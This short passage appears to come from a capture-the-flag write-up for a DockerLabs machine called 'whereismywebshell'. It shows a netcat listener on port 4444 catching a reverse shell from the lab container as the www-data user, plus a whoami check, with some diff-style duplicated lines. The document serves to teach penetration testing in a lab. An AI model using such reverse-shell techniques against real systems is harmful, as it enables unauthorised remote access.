ElCyberCurioso/elcybercurioso.github.io/_posts/2025-10-27-dockerlabs-whereismywebshell.md

 └─$ nc -nlvp 4444
 listening on [any] 4444 ...
 connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 58404
-bash: cannot set terminal process group (23): Inappropriate ioctl for device
-bash: no job control in this shell www-data@d4d4dbf1a2c0:/var/www/html$ whoami whoami www-data
+www-data@d4d4dbf1a2c0:/var/www/html$ whoami
+whoami
+www-data